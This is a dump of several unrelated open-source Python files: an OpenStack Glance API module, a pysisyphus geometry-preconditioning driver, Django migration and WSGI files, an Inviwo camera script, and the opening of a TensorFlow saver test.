        self.__render(json.tojson(Namespace, namespace), response)
    def index(self, response, result):
        """Attach pagination links, then render the namespace collection."""
        params = dict(response.request.params)
        params.pop('marker', None)
        query = urlparse.urlencode(params)
        result.first = "/v2/metadefs/namespaces"
        result.schema = "/v2/schemas/metadefs/namespaces"
        if query:
            result.first = '%s?%s' % (result.first, query)
        if result.next:
            # 'next' link repeats the query with the marker advanced.
            params['marker'] = result.next
            result.next = '/v2/metadefs/namespaces?%s' % urlparse.urlencode(
                params)
        self.__render(json.tojson(Namespaces, result), response)
    def update(self, response, namespace):
        self.__render(json.tojson(Namespace, namespace), response, http.OK)
    def delete(self, response, result):
        response.status_int = http.NO_CONTENT
    def delete_objects(self, response, result):
        response.status_int = http.NO_CONTENT
    def delete_properties(self, response, result):
        response.status_int = http.NO_CONTENT
    def delete_tags(self, response, result):
        response.status_int = http.NO_CONTENT
def _get_base_definitions():
    """Return the shared '#/definitions' fragments (see get_schema_definitions)."""
    return get_schema_definitions()
def get_schema_definitions():
    """Return reusable JSON-schema definitions for metadef namespace schemas.

    The ``property`` definition models a map of metadata properties: every
    value must carry a title and a type, plus any of the optional JSON-schema
    validation keywords (minimum/maximum, pattern, enum, items, ...).
    """
    return {
        "positiveInteger": {
            "type": "integer",
            "minimum": 0
        },
        "positiveIntegerDefault0": {
            "allOf": [
                {"$ref": "#/definitions/positiveInteger"},
                {"default": 0}
            ]
        },
        "stringArray": {
            "type": "array",
            "items": {"type": "string"},
            # "minItems": 1,
            "uniqueItems": True
        },
        "property": {
            "type": "object",
            "additionalProperties": {
                "type": "object",
                "required": ["title", "type"],
                "properties": {
                    "name": {
                        "type": "string",
                        "maxLength": 80
                    },
                    "title": {
                        "type": "string"
                    },
                    "description": {
                        "type": "string"
                    },
                    "operators": {
                        "type": "array",
                        "items": {
                            "type": "string"
                        }
                    },
                    "type": {
                        "type": "string",
                        "enum": [
                            "array",
                            "boolean",
                            "integer",
                            "number",
                            "object",
                            "string",
                            None
                        ]
                    },
                    "required": {
                        "$ref": "#/definitions/stringArray"
                    },
                    "minimum": {
                        "type": "number"
                    },
                    "maximum": {
                        "type": "number"
                    },
                    "maxLength": {
                        "$ref": "#/definitions/positiveInteger"
                    },
                    "minLength": {
                        "$ref": "#/definitions/positiveIntegerDefault0"
                    },
                    "pattern": {
                        "type": "string",
                        "format": "regex"
                    },
                    "enum": {
                        "type": "array"
                    },
                    "readonly": {
                        "type": "boolean"
                    },
                    "default": {},
                    # Item schema used when the property's type is "array".
                    "items": {
                        "type": "object",
                        "properties": {
                            "type": {
                                "type": "string",
                                "enum": [
                                    "array",
                                    "boolean",
                                    "integer",
                                    "number",
                                    "object",
                                    "string",
                                    None
                                ]
                            },
                            "enum": {
                                "type": "array"
                            }
                        }
                    },
                    "maxItems": {
                        "$ref": "#/definitions/positiveInteger"
                    },
                    "minItems": {
                        "$ref": "#/definitions/positiveIntegerDefault0"
                    },
                    "uniqueItems": {
                        "type": "boolean",
                        "default": False
                    },
                    "additionalItems": {
                        "type": "boolean"
                    },
                }
            }
        }
    }
def _get_base_properties():
    """Return the JSON-schema properties describing a metadef namespace."""
    return {
        "namespace": {
            "type": "string",
            "description": _("The unique namespace text."),
            "maxLength": 80,
        },
        "display_name": {
            "type": "string",
            "description": _("The user friendly name for the namespace. Used "
                             "by UI if available."),
            "maxLength": 80,
        },
        "description": {
            "type": "string",
            "description": _("Provides a user friendly description of the "
                             "namespace."),
            "maxLength": 500,
        },
        "visibility": {
            "type": "string",
            "description": _("Scope of namespace accessibility."),
            "enum": ["public", "private"],
        },
        "protected": {
            "type": "boolean",
            "description": _("If true, namespace will not be deletable."),
        },
        "owner": {
            "type": "string",
            "description": _("Owner of the namespace."),
            "maxLength": 255,
        },
        "created_at": {
            "type": "string",
            "readOnly": True,
            "description": _("Date and time of namespace creation"),
            "format": "date-time"
        },
        "updated_at": {
            "type": "string",
            "readOnly": True,
            "description": _("Date and time of the last namespace"
                             " modification"),
            "format": "date-time"
        },
        # 'schema' and 'self' are server-generated links.
        "schema": {
            'readOnly': True,
            "type": "string"
        },
        "self": {
            'readOnly': True,
            "type": "string"
        },
        "resource_type_associations": {
            "type": "array",
            "items": {
                "type": "object",
                "properties": {
                    "name": {
                        "type": "string"
                    },
                    "prefix": {
                        "type": "string"
                    },
                    "properties_target": {
                        "type": "string"
                    }
                }
            }
        },
        "properties": {
            "$ref": "#/definitions/property"
        },
        "objects": {
            "type": "array",
            "items": {
                "type": "object",
                "properties": {
                    "name": {
                        "type": "string"
                    },
                    "description": {
                        "type": "string"
                    },
                    "required": {
                        "$ref": "#/definitions/stringArray"
                    },
                    "properties": {
                        "$ref": "#/definitions/property"
                    },
                }
            }
        },
        "tags": {
            "type": "array",
            "items": {
                "type": "object",
                "properties": {
                    "name": {
                        "type": "string"
                    }
                }
            }
        },
    }
def get_schema():
    """Build the Glance Schema object describing a single metadef namespace."""
    properties = _get_base_properties()
    definitions = _get_base_definitions()
    required = Namespace.get_mandatory_attrs()
    return glance.schema.Schema(
        'namespace', properties, required=required, definitions=definitions
    )
def get_collection_schema():
    """Build the collection schema wrapping the single-namespace schema."""
    return glance.schema.CollectionSchema('namespaces', get_schema())
def get_namespace_href(namespace):
    """Return the v2 metadefs URI path for *namespace*."""
    return '/v2/metadefs/namespaces/%s' % namespace.namespace
def get_object_href(namespace_name, metadef_object):
    """Return the v2 metadefs URI path of *metadef_object* inside a namespace."""
    return '/v2/metadefs/namespaces/%s/objects/%s' % (
        namespace_name, metadef_object.name)
def get_tag_href(namespace_name, metadef_tag):
    """Return the v2 metadefs URI path of *metadef_tag* inside a namespace."""
    return '/v2/metadefs/namespaces/%s/tags/%s' % (
        namespace_name, metadef_tag.name)
def create_resource():
    """Namespaces resource factory method."""
    schema = get_schema()
    deserializer = RequestDeserializer(schema)
    serializer = ResponseSerializer(schema)
    return wsgi.Resource(NamespaceController(), deserializer, serializer)
| openstack/glance | glance/api/v2/metadef_namespaces.py | Python | apache-2.0 | 38,490 | 0 |
# [1] https://doi.org/10.1002/jcc.26495
# Habershon, 2021
"""
prp a901cdfacc579eb63b193cbc9043212e8b57746f
pysis 340ab6105ac4156f0613b4d0e8f080d9f195530c
do_trans accidentally disabled in transtorque
"""
from functools import reduce
import itertools as it
import numpy as np
from pysisyphus.calculators import (
HardSphere,
TransTorque,
AtomAtomTransTorque,
Composite,
)
from pysisyphus.constants import BOHR2ANG
from pysisyphus.Geometry import Geometry
from pysisyphus.helpers import align_coords
from pysisyphus.helpers_pure import highlight_text
from pysisyphus.init_logging import init_logging
from pysisyphus.intcoords.setup import get_fragments, get_bond_sets
from pysisyphus.xyzloader import coords_to_trj, make_xyz_str
init_logging()
class SteepestDescent:
    """Simple cartesian minimizer used by the preconditioning stages.

    Despite the name, steps mix the current forces with the previous step
    using a Fletcher-Reeves-like factor (conjugate-gradient flavored).
    """
    def __init__(
        self,
        geom,
        max_cycles=1000,
        max_step=0.05,
        rms_force=0.05,
        rms_force_only=True,  # NOTE(review): stored but never used -- confirm
        prefix=None,  # NOTE(review): stored but never used -- confirm
        dump=False,
        print_mod=25,
    ):
        self.geom = geom
        self.max_cycles = max_cycles
        self.max_step = max_step
        self.rms_force = rms_force
        self.rms_force_only = rms_force_only
        self.prefix = prefix
        self.dump = dump
        self.print_mod = print_mod
        # Pre-allocated coordinate history; truncated to the actual number
        # of cycles at the end of run().
        self.all_coords = np.zeros((max_cycles, self.geom.coords.size))
    def run(self):
        """Minimize the geometry's coordinates in place (mutates self.geom)."""
        coords = self.geom.coords.copy()
        to_dump = []
        for i in range(self.max_cycles):
            self.all_coords[i] = coords.copy()
            # Dump only every 100th geometry to keep the trajectory small.
            if self.dump and (i % 100) == 0:
                to_dump.append(self.geom.as_xyz(cart_coords=coords))
            results = self.geom.get_energy_and_forces_at(coords)
            forces = results["forces"]
            norm = np.linalg.norm(forces)
            rms = np.sqrt(np.mean(forces ** 2))
            if rms <= self.rms_force:
                print(f"Converged in cycle {i}. Breaking.")
                break
            if i > 0:
                # Fletcher-Reeves-like mixing with the previous step.
                beta = forces.dot(forces) / self.prev_forces.dot(self.prev_forces)
                step = forces + beta * self.prev_step
            else:
                step = forces.copy()
            # step = forces.copy()
            # Scale down so the biggest step component is at most max_step.
            step *= min(self.max_step / np.abs(step).max(), 1)
            if i % self.print_mod == 0:
                print(
                    f"{i:03d}: |forces|={norm: >12.6f} "
                    f"rms(forces)={np.sqrt(np.mean(forces**2)): >12.6f} "
                    f"|step|={np.linalg.norm(step): >12.6f}"
                )
            coords += step
            self.prev_step = step
            self.prev_forces = forces
        self.geom.coords = coords
        self.all_coords = self.all_coords[: i + 1]
        if to_dump:
            # NOTE(review): filename ignores self.prefix -- confirm intent.
            with open("optimization.trj", "w") as handle:
                handle.write("\n".join(to_dump))
def get_fragments_and_bonds(geoms):
    """Determine fragments and bonds of one geometry (or a 1-item sequence).

    Returns ``(fragments, frag_bonds, bonds, union_geom)`` where *fragments*
    is a list of frozensets of atom indices, *frag_bonds* contains the bonds
    belonging to each fragment, *bonds* is the set of all bonds and
    *union_geom* is a cartesian copy of the input geometry. Merging several
    geometries into a union is not implemented yet and raises.
    """
    if isinstance(geoms, Geometry) or len(geoms) == 1:
        # Bug fix: a 1-item sequence previously left 'geom' bound to the
        # sequence itself, which lacks .atoms/.coords3d and crashed below.
        geom = geoms if isinstance(geoms, Geometry) else geoms[0]
        atoms = geom.atoms
        coords3d = geom.coords3d
        bonds = [frozenset(bond) for bond in get_bond_sets(atoms, coords3d)]
        fragments = get_fragments(atoms, coords3d.flatten(), bond_inds=bonds)
        frag_inds = list(it.chain(*fragments))
        # Atoms that are not part of any bond are added as 1-atom fragments.
        if len(frag_inds) != len(atoms):
            all_inds = list(range(len(atoms)))
            missing_inds = set(all_inds) - set(frag_inds)
            for mi in missing_inds:
                fragments.append(frozenset((mi,)))
        frag_bonds = [
            list(filter(lambda bond: bond <= frag, bonds)) for frag in fragments
        ]
        # Assert that we do not have any interfragment bonds.
        assert reduce((lambda x, y: x + len(y)), frag_bonds, 0) == len(bonds)
        union_geom = geom.copy(coord_type="cart")
    else:
        # Form union, determine consistent new indices for all atoms and
        # calculate bonds.
        raise Exception()
    return fragments, frag_bonds, set(bonds), union_geom
def get_rot_mat(coords3d_1, coords3d_2, center=False):
    """Best-fit rotation matrix mapping coords3d_1 onto coords3d_2 (Kabsch/SVD).

    With center=True both coordinate sets are shifted to their centroids
    before the fit. Reflections (det < 0) are corrected so a proper
    rotation is always returned.
    """
    c3d1 = np.reshape(coords3d_1, (-1, 3)).copy()
    c3d2 = np.reshape(coords3d_2, (-1, 3)).copy()
    if center:
        c3d1 -= c3d1.mean(axis=0)
        c3d2 -= c3d2.mean(axis=0)
    U, _, Vt = np.linalg.svd(c3d1.T.dot(c3d2))
    rot_mat = U.dot(Vt)
    # Flip the last column of U to avoid improper rotations (reflections).
    if np.linalg.det(rot_mat) < 0:
        U[:, -1] *= -1
        rot_mat = U.dot(Vt)
    return rot_mat
def get_steps_to_active_atom_mean(
    frag_lists, iter_frag_lists, ind_dict, coords3d, skip=True
):
    """Per fragment, average the centroids of active atoms on other fragments.

    ind_dict maps (n, m) pairs to the active atom indices; with skip=True the
    m == n (self) contribution is left out. Returns an (n_frags, 3) array.
    """
    frag_num = len(frag_lists)
    steps = np.zeros((frag_num, 3))
    for m in range(frag_num):
        accum = np.zeros(3)
        for n in range(len(iter_frag_lists)):
            if skip and m == n:
                continue
            active = ind_dict[(n, m)]
            if len(active) == 0:
                continue
            accum += coords3d[active].mean(axis=0)
        # Note: averaged over the total fragment count, not the number of
        # contributing terms.
        steps[m] = accum / frag_num
    return steps
def report_frags(rgeom, pgeom, rfrags, pfrags, rbond_diff, pbond_diff):
    """Print reactant/product geometries, their fragments and changed bonds."""
    for name, geom in (("Reactant(s)", rgeom), ("Product(s)", pgeom)):
        print(f"{name}: {geom}\n\n{geom.as_xyz()}\n")
    def get_frag_atoms(geom, frag):
        # Atom symbols belonging to one fragment.
        atoms = geom.atoms
        return [atoms[i] for i in frag]
    for name, geom, frags in (("reactant", rgeom, rfrags), ("product", pgeom, pfrags)):
        print(f"{len(frags)} Fragment(s) in {name} image:\n")
        for frag in frags:
            frag_atoms = get_frag_atoms(geom, frag)
            frag_coords = geom.coords3d[list(frag)]
            frag_xyz = make_xyz_str(frag_atoms, frag_coords * BOHR2ANG)
            print(frag_xyz + "\n")
    def print_bonds(geom, bonds):
        # One line per bond: atom indices plus element symbols.
        for from_, to_ in bonds:
            from_atom, to_atom = [geom.atoms[i] for i in (from_, to_)]
            print(f"\t({from_: >3d}{from_atom} - {to_: >3d}{to_atom})")
    print("Bonds broken in reactant image:")
    print_bonds(rgeom, rbond_diff)
    print()
    print("Bonds formed in product image:")
    print_bonds(pgeom, pbond_diff)
    print()
def report_mats(name, mats):
    """Print one '<name>(m, n): indices' line per key of *mats*, then a blank line."""
    for key, indices in mats.items():
        m, n = key
        print(f"{name}({m}, {n}): {indices}")
    print()
def center_fragments(frag_list, geom):
    """Shift every fragment so its centroid sits at the origin (in place)."""
    coords3d = geom.coords3d
    for frag in frag_list:
        coords3d[frag] = coords3d[frag] - coords3d[frag].mean(axis=0)
def get_which_frag(frags):
    """Map every atom index to the index of the fragment containing it."""
    return {
        atom_ind: frag_ind
        for frag_ind, frag in enumerate(frags)
        for atom_ind in frag
    }
def form_A(frags, which_frag, formed_bonds):
    """Construct the A-matrices.

    A[(m, n)] collects the atoms of fragment m that form/break bonds with
    atoms of fragment n, derived from *formed_bonds* via *which_frag*.
    """
    A = dict()
    for a, b in formed_bonds:
        frag_a, frag_b = which_frag[a], which_frag[b]
        A.setdefault((frag_a, frag_b), list()).append(a)
        A.setdefault((frag_b, frag_a), list()).append(b)
    return A
# Stage-specific force constants (kappa) and convergence settings used by
# precon_pos_rot(); the "s2"/"s4"/"s5" prefixes refer to the algorithm stages.
CONFIG = {
    "s2_hs_kappa": 1.0,
    "s4_hs_kappa": 50.0,
    "s4_v_kappa": 1.0,
    "s4_w_kappa": 1.0,
    "s5_v_kappa": 1.0,
    "s5_w_kappa": 3.0,
    "s5_hs_kappa": 10.0,
    "s5_z_kappa": 2.0,
    "s5_trans": True,
    "s5_rms_force": 0.01,
}
def precon_pos_rot(reactants, products, prefix=None, config=CONFIG):
    """Precondition translation and rotation of reactant/product fragments.

    Five-stage procedure after Habershon [1]: (1) initial placement,
    (2) intra-image hard-sphere separation, (3) initial orientation,
    (4) alignment of reactive atoms, (5) refinement. Dumps per-stage
    trajectories ('prefix' is prepended to the filenames) and returns
    the adjusted union geometries (runion, punion).
    """
    c = config
    if prefix is None:
        prefix = ""
    def make_fn(fn):
        return prefix + fn
    rfrags, rfrag_bonds, rbonds, runion = get_fragments_and_bonds(reactants)
    pfrags, pfrag_bonds, pbonds, punion = get_fragments_and_bonds(products)
    pbond_diff = pbonds - rbonds # Present in product(s)
    rbond_diff = rbonds - pbonds # Present in reactant(s)
    # All atoms taking part in bond forming/breaking.
    involved_atoms = set(tuple(it.chain(*pbond_diff)))
    involved_atoms |= set(tuple(it.chain(*rbond_diff)))
    which_rfrag = get_which_frag(rfrags)
    which_pfrag = get_which_frag(pfrags)
    rfrag_lists = [list(frag) for frag in rfrags]
    pfrag_lists = [list(frag) for frag in pfrags]
    report_frags(runion, punion, rfrags, pfrags, rbond_diff, pbond_diff)
    def form_C(m_frags, n_frags):
        """Construct the C-matrices.
        Returns a dict with (m, n) keys, containing the respective
        unions of rectant fragment n and product fragment m.
        """
        C = dict()
        for m, m_frag in enumerate(m_frags):
            for n, n_frag in enumerate(n_frags):
                C[(m, n)] = list(m_frag & n_frag)
        return C
    CR = form_C(rfrags, pfrags)
    assert len(set(it.chain(*CR.values()))) == len(runion.atoms)
    CP = {(n, m): union for (m, n), union in CR.items()}
    print("CR(m, n), subset of atoms in molecule Rn which are in Pm after reaction.")
    report_mats("CR", CR)
    print("CP(m, n), subset of atoms in molecule Pn which are in Rm before reaction.")
    report_mats("CP", CP)
    def form_B(C):
        """Construct the B-matrices.
        Returns a dict with (m, n) keys, containing the respective
        subsets of C[(m, n)] that acutally participate in bond-breaking/forming.
        """
        B = dict()
        for (m, n), union in C.items():
            key = (m, n)
            B.setdefault(key, set())
            B[key] |= set(union) & involved_atoms
        for k, v in B.items():
            B[k] = list(v)
        return B
    BR = form_B(CR)
    BP = form_B(CP)
    print(
        "BR(m, n), subset of atoms in CRnm actually involved in bond forming/breaking."
    )
    report_mats("BR", BR)
    print(
        "BP(m, n), subset of atoms in CPnm actually involved in bond forming/breaking."
    )
    report_mats("BP", BP)
    AR = form_A(rfrags, which_rfrag, pbond_diff)
    AP = form_A(pfrags, which_pfrag, rbond_diff)
    print("AR(m, n), subset of atoms in Rm that form bonds to atoms in Rn.")
    report_mats("AR", AR)
    print(
        "AP(m, n), subset of atoms in Pm which had bonds with Pn (formerly bonded in R)."
    )
    report_mats("AP", AP)
    def form_G(A):
        # Union of all active atoms per fragment m, over every partner n.
        G = dict()
        for (m, n), inds in A.items():
            G.setdefault(m, set())
            G[m] |= set(inds)
        for k, v in G.items():
            G[k] = list(v)
            assert len(v) > 0
        return G
    GR = form_G(AR)
    # GP = form_G(AP)
    print(f"GR: {GR}")
    # print(f"GP: {GP}")
    # Initial, centered, coordinates and 5 stages
    r_coords = np.zeros((6, runion.coords.size))
    p_coords = np.zeros((6, punion.coords.size))
    def backup_coords(stage):
        # Snapshot the current coordinates after the given stage.
        assert 0 <= stage < 6
        r_coords[stage] = runion.coords.copy()
        p_coords[stage] = punion.coords.copy()
    """
    STAGE 1
    Initial positioning of reactant and product molecules
    """
    # Center fragments at their geometric average
    center_fragments(rfrag_lists, runion)
    center_fragments(pfrag_lists, punion)
    backup_coords(0)
    # Translate reactant molecules
    alphas = get_steps_to_active_atom_mean(
        rfrag_lists, rfrag_lists, AR, runion.coords3d
    )
    for rfrag, alpha in zip(rfrag_lists, alphas):
        runion.coords3d[rfrag] += alpha
    # Translate product molecules
    betas = get_steps_to_active_atom_mean(
        pfrag_lists, rfrag_lists, BR, punion.coords3d, skip=False
    )
    sigmas = get_steps_to_active_atom_mean(
        pfrag_lists, rfrag_lists, CR, punion.coords3d, skip=False
    )
    bs_half = (betas + sigmas) / 2
    for pfrag, bsh in zip(pfrag_lists, bs_half):
        punion.coords3d[pfrag] += bsh
    backup_coords(1)
    print()
    """
    STAGE 2
    Intra-image Inter-molecular Hard-Sphere forces
    """
    print(highlight_text("Stage 2, Hard-Sphere Forces"))
    s2_hs_kappa = c["s2_hs_kappa"]
    def hardsphere_sd_opt(geom, frag_lists, title):
        # Relax one image under pure hard-sphere repulsion.
        print(highlight_text(title, level=1))
        calc = HardSphere(geom, frag_lists, kappa=s2_hs_kappa)
        geom.set_calculator(calc)
        opt_kwargs = {
            "max_cycles": 1000,
            "max_step": 0.5,
            "rms_force": 0.05,
        }
        opt = SteepestDescent(geom, **opt_kwargs)
        opt.run()
    hardsphere_sd_opt(runion, rfrag_lists, "Reactants")
    hardsphere_sd_opt(punion, pfrag_lists, "Products")
    backup_coords(2)
    print()
    """
    STAGE 3
    Initial orientation of molecules
    """
    print(highlight_text("Stage 3, Initial Orientation"))
    # Rotate R fragments
    if len(rfrag_lists) > 1:
        alphas = get_steps_to_active_atom_mean(
            rfrag_lists, rfrag_lists, AR, runion.coords3d
        )
        gammas = np.zeros_like(alphas)
        for m, rfrag in enumerate(rfrag_lists):
            Gm = GR[m]
            gammas[m] = runion.coords3d[Gm].mean(axis=0)
        r_means = np.array([runion.coords3d[frag].mean(axis=0) for frag in rfrag_lists])
        for m, rfrag in enumerate(rfrag_lists):
            gm = r_means[m]
            # Rotate so the active-atom centroid points towards alpha.
            rot_mat = get_rot_mat(gammas[m] - gm, alphas[m] - gm)
            rot_coords = (runion.coords3d[rfrag] - gm).dot(rot_mat)
            runion.coords3d[rfrag] = rot_coords + gm - rot_coords.mean(axis=0)
    Ns = [0] * len(pfrag_lists)
    for (m, n), CPmn in CP.items():
        Ns[m] += len(CPmn)
    # Rotate P fragments
    for m, pfrag in enumerate(pfrag_lists):
        pc3d = punion.coords3d[pfrag]
        gm = pc3d.mean(axis=0)
        r0Pm = pc3d - gm[None, :]
        mu_Pm = np.zeros_like(r0Pm)
        N = Ns[m]
        for n, rfrag in enumerate(rfrag_lists):
            # Skip rotation of 1-atom fragments
            if len(rfrag) == 1:
                continue
            CPmn = CP[(m, n)]
            RPmRn = get_rot_mat(
                punion.coords3d[CPmn], runion.coords3d[CPmn], center=True
            )
            print(f"m={m}, n={n}, len(CPmn)={len(CPmn)}")
            # Eq. (A2) in [1]
            r0Pmn = np.einsum("ij,jk->ki", RPmRn, r0Pm.T)
            mu_Pm += len(CPmn) ** 2 / N * r0Pmn
        rot_mat = get_rot_mat(r0Pm, mu_Pm, center=True)
        rot_coords = r0Pm.dot(rot_mat)
        punion.coords3d[pfrag] = rot_coords + gm - rot_coords.mean(axis=0)
    backup_coords(3)
    print()
    """
    STAGE 4
    Alignment of reactive atoms
    This stage involves three forces: hard-sphere forces and two kinds
    of average translational (^t) and rotational (^r) forces (v and w,
    (A3) - (A5) in [1]).
    v^t and v^r arise from atoms in A^Rnm and A^Rmn, that is atoms that
    participate in bond forming/breaking in R. The translational force
    is usually attractive, which is counteracted by the repulsive hard-sphere
    forces.
    """
    print(highlight_text("Stage 4, Alignment Of Reactive Atoms"))
    def composite_sd_opt(geom, keys_calcs, title, rms_force=0.05):
        # Relax one image under the sum of the supplied calculators.
        print(highlight_text(title, level=1))
        final = " + ".join([k for k in keys_calcs.keys()])
        calc = Composite(final, keys_calcs=keys_calcs)
        geom.set_calculator(calc)
        opt_kwargs = {
            "max_step": 0.05,
            "max_cycles": 2000,
            "rms_force": rms_force,
        }
        opt = SteepestDescent(geom, **opt_kwargs)
        opt.run()
    def get_vr_trans_torque(kappa=1.0, do_trans=True):
        return TransTorque(
            rfrag_lists, rfrag_lists, AR, AR, kappa=kappa, do_trans=do_trans
        )
    def r_weight_func(m, n, a, b):
        """As required for (A5) in [1]."""
        return 1 if a in BR[(m, n)] else 0.5
    def get_wr_trans_torque(kappa=1.0, do_trans=True):
        return TransTorque(
            rfrag_lists,
            pfrag_lists,
            CR,
            CP,
            weight_func=r_weight_func,
            skip=False,
            b_coords3d=punion.coords3d,
            kappa=kappa,
            do_trans=do_trans,
        )
    def get_vp_trans_torque(kappa=1.0, do_trans=True):
        return TransTorque(
            pfrag_lists, pfrag_lists, AP, AP, kappa=kappa, do_trans=do_trans
        )
    def p_weight_func(m, n, a, b):
        """As required for (A5) in [1]."""
        return 1 if a in BP[(m, n)] else 0.5
    def get_wp_trans_torque(kappa=1.0, do_trans=True):
        return TransTorque(
            pfrag_lists,
            rfrag_lists,
            CP,
            CR,
            weight_func=p_weight_func,
            skip=False,
            b_coords3d=runion.coords3d,
            kappa=kappa,
            do_trans=do_trans,
        )
    s4_hs_kappa = c["s4_hs_kappa"]
    s4_v_kappa = c["s4_v_kappa"]
    s4_w_kappa = c["s4_w_kappa"]
    vr_trans_torque = get_vr_trans_torque(kappa=s4_v_kappa)
    wr_trans_torque = get_wr_trans_torque(kappa=s4_w_kappa)
    r_keys_calcs = {
        "hardsphere": HardSphere(runion, rfrag_lists, kappa=s4_hs_kappa),
        "v": vr_trans_torque,
        "w": wr_trans_torque,
    }
    composite_sd_opt(runion, r_keys_calcs, "Reactants")
    vp_trans_torque = get_vp_trans_torque(kappa=s4_v_kappa)
    wp_trans_torque = get_wp_trans_torque(kappa=s4_w_kappa)
    p_keys_calcs = {
        "hardsphere": HardSphere(punion, pfrag_lists, kappa=s4_hs_kappa),
        "v": vp_trans_torque,
        "w": wp_trans_torque,
    }
    composite_sd_opt(punion, p_keys_calcs, "Products")
    backup_coords(4)
    print()
    """
    STAGE 5
    Refinement of atomic positions using further hard-sphere forces.
    """
    print(highlight_text("Stage 5, Refinement"))
    s5_v_kappa = c["s5_v_kappa"]
    s5_w_kappa = c["s5_w_kappa"]
    s5_hs_kappa = c["s5_hs_kappa"]
    s5_z_kappa = c["s5_z_kappa"]
    s5_trans = c["s5_trans"]
    s5_rms_force = c["s5_rms_force"]
    vr_trans_torque = get_vr_trans_torque(kappa=s5_v_kappa, do_trans=s5_trans)
    wr_trans_torque = get_wr_trans_torque(kappa=s5_w_kappa, do_trans=s5_trans)
    zr_aa_trans_torque = AtomAtomTransTorque(runion, rfrag_lists, AR, kappa=s5_z_kappa)
    r_keys_calcs = {
        "v": vr_trans_torque,
        "w": wr_trans_torque,
        "hardsphere": HardSphere(runion, rfrag_lists, kappa=s5_hs_kappa),
        "z": zr_aa_trans_torque,
    }
    composite_sd_opt(runion, r_keys_calcs, "Reactants", rms_force=s5_rms_force)
    vp_trans_torque = get_vp_trans_torque(kappa=s5_v_kappa, do_trans=s5_trans)
    wp_trans_torque = get_wp_trans_torque(kappa=s5_w_kappa, do_trans=s5_trans)
    zp_aa_trans_torque = AtomAtomTransTorque(punion, pfrag_lists, AP, kappa=s5_z_kappa)
    p_keys_calcs = {
        "v": vp_trans_torque,
        "w": wp_trans_torque,
        "hardsphere": HardSphere(punion, pfrag_lists, kappa=s5_hs_kappa),
        "z": zp_aa_trans_torque,
    }
    composite_sd_opt(punion, p_keys_calcs, "Products", rms_force=s5_rms_force)
    backup_coords(5)
    print()
    with open(make_fn("s5.trj"), "w") as handle:
        handle.write("\n".join([geom.as_xyz() for geom in (runion, punion)]))
    def dump_stages(fn, atoms, coords_list):
        # Align all stage snapshots and write them as one trajectory.
        align_coords(coords_list)
        comments = [f"Stage {i}" for i in range(coords_list.shape[0])]
        fn = make_fn(fn)
        coords_to_trj(fn, atoms, coords_list, comments=comments)
    dump_stages("r_coords.trj", runion.atoms, r_coords)
    dump_stages("p_coords.trj", punion.atoms, p_coords)
    runion.set_calculator(None)
    punion.set_calculator(None)
    return runion, punion
def run_precontr(reactant_geom, product_geom, **kwargs):
    """Driver wrapper around precon_pos_rot() that prints a citation banner."""
    banner = highlight_text("Preconditioning of Translation & Rotation")
    citation = "\n\nPlease cite https://doi.org/10.1002/jcc.26495\n"
    print(banner + citation)
    return precon_pos_rot(reactant_geom, product_geom, **kwargs)
| eljost/pysisyphus | pysisyphus/drivers/precon_pos_rot.py | Python | gpl-3.0 | 19,597 | 0.000714 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Alter Broadcast.series (nullable/blank FK) and Broadcast.status (blank)."""
    dependencies = [
        ('broadcasts', '0001_initial'),
    ]
    operations = [
        # Broadcasts no longer require a series; reverse accessor is 'broadcasts'.
        migrations.AlterField(
            model_name='broadcast',
            name='series',
            field=models.ForeignKey(related_name=b'broadcasts', blank=True, to='broadcasts.Series', null=True),
        ),
        # Status may be left empty in forms.
        migrations.AlterField(
            model_name='broadcast',
            name='status',
            field=models.CharField(max_length=200, blank=True),
        ),
    ]
| bryanveloso/avalonstar-tv | apps/broadcasts/migrations/0002_auto_20140927_0415.py | Python | apache-2.0 | 627 | 0.001595 |
"""
WSGI config for tiendalibros project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project's settings module before building the app.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tiendalibros.settings")
# Module-level WSGI callable picked up by servers (gunicorn/uWSGI/mod_wsgi).
application = get_wsgi_application()
| secnot/tutorial-tienda-django-paypal-1 | tiendalibros/tiendalibros/wsgi.py | Python | gpl-3.0 | 401 | 0 |
# Inviwo Python script
import inviwo
import math
import time

# time.clock() was deprecated in Python 3.3 and removed in 3.8;
# perf_counter() is the drop-in replacement for benchmarking.
start = time.perf_counter()

scale = 1
d = 15  # orbit radius of the camera
steps = 120

# Orbit the camera a full turn around the origin in the xz-plane at height 3.
# math.pi (instead of the old 3.14 approximation) closes the circle exactly.
for i in range(0, steps):
    r = (2 * math.pi * i) / steps
    x = d * math.sin(r)
    z = -d * math.cos(r)
    inviwo.setPropertyValue("EntryExitPoints.camera",
                            ((x * scale, 3 * scale, z * scale), (0, 0, 0), (0, 1, 0)))

# Roll the camera by rotating its up-vector through a full turn.
for i in range(0, steps):
    r = (2 * math.pi * i) / steps
    x = 1.0 * math.sin(r)
    z = 1.0 * math.cos(r)
    inviwo.setCameraUp("EntryExitPoints.camera", (x * scale, z * scale, 0))

end = time.perf_counter()

fps = 2 * steps / (end - start)
fps = round(fps, 3)
print("Frames per second: " + str(fps))
print("Time per frame: " + str(round(1000/fps,1)) + " ms") | sarbi127/inviwo | data/scripts/camerarotation.py | Python | bsd-2-clause | 687 | 0.040757 |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for experiment utils."""
import numpy as np
import os
import tempfile
import tensorflow as tf
import experiment_utils
class AsymmetricSaverTest(tf.test.TestCase):
    """Tests for asymmetric saver."""
    def test_save_restore(self):
        """Round trip: x restores from the saver's checkpoint, y from its RestoreSpec."""
        x = tf.get_variable('x', [])
        y = tf.get_variable('y', [])
        x_dir = tempfile.mkdtemp()
        y_dir = tempfile.mkdtemp()
        x_checkpoint_base = os.path.join(x_dir, 'model.ckpt')
        y_checkpoint_base = os.path.join(y_dir, 'model.ckpt')
        normal_saver = tf.train.Saver([x, y])
